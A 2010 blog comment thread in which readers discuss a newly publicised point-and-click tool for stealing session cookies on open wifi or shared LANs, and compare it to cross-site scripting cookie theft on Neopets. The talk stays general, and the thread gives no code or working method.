conuly: Quote: "I'm blogging this" (blogging)
conuly ([personal profile] conuly) wrote2010-10-27 01:28 pm
  • Add Memory
  • Share This Entry
Entry tags:
Flat | Top-Level Comments Only
(deleted comment)
pne: A picture of a plush toy, halfway between a duck and a platypus, with a green body and a yellow bill and feet. (Default)

[personal profile] pne 2010-10-28 06:59 am (UTC)(link)
I'd replace "(wireless)" with "(usually wireless)" or something like that - the attack would work equally well in, say, a company where there are lots of people on the local LAN.

(Or, theoretically, at home, but there LANs usually only connect a single-figure number of computers, typically under the control of people you know and have some level of trust with.)

Ditto on the "this isn't new in principle, it just got easier and more idiot-proof (script-kiddie enabled)", though.

[identity profile] silver-chipmunk.livejournal.com 2010-10-27 05:55 pm (UTC)(link)
Holy crap! Thanks for posting this!

[identity profile] prezzey.livejournal.com 2010-10-27 06:20 pm (UTC)(link)
In practice IMO it's only dangerous if you are on an open wifi network (or a LAN where you do not trust all the computers physically connected to the network - I've been in that situation) and you transmit sensitive information unencrypted. Which is something you should not do, anyway. There are people who run open wifi networks only to capture the data of people using their hotspot.

This thing just grabs cookies but there are tools which grab everything and you can cherry-pick. I think the key attraction here is that this piece of software does not require much by way of technical expertise.

[identity profile] dandelion.livejournal.com 2010-10-27 07:02 pm (UTC)(link)
It doesn't sound all that different to ordinary cookie-grabbing on sites like Neopets. The only scary part is it can now be done by people with very little technical knowledge (which widens the field of potential abusers significantly).
siderea: (Default)

[personal profile] siderea 2010-10-27 07:34 pm (UTC)(link)
"ordinary cookie-grabbing on sites like Neopets"?
conuly: (Default)

[personal profile] conuly 2010-10-27 07:56 pm (UTC)(link)
We know each other from a Neopets-related board. CG-ing is epidemic there.
siderea: (Default)

[personal profile] siderea 2010-10-27 09:03 pm (UTC)(link)
Yes, but how is the CGing done? Do you guys have a convenient App For That?

[identity profile] dandelion.livejournal.com 2010-10-27 09:43 pm (UTC)(link)
No, hence why it's limited to people with some technical experience; it's done by inserting fairly freely-available Javascript into user-editable areas. Each time it's happened, more of the areas have been sanitised but people are quite creative.
siderea: (Default)

[personal profile] siderea 2010-10-27 09:53 pm (UTC)(link)
Ah! The technical term for that is a "Cross-site Scripting Attack", or XSS for short. LJ has had it's own problems with those.
ext_78: A picture of a plush animal. It looks a bit like a cross between a duck and a platypus. (Default)

[identity profile] pne.livejournal.com 2010-10-28 08:15 am (UTC)(link)
The only scary part is it can now be done by people with very little technical knowledge

This.
siderea: (Default)

[personal profile] siderea 2010-10-27 07:35 pm (UTC)(link)
See my post if you haven't.
Flat | Top-Level Comments Only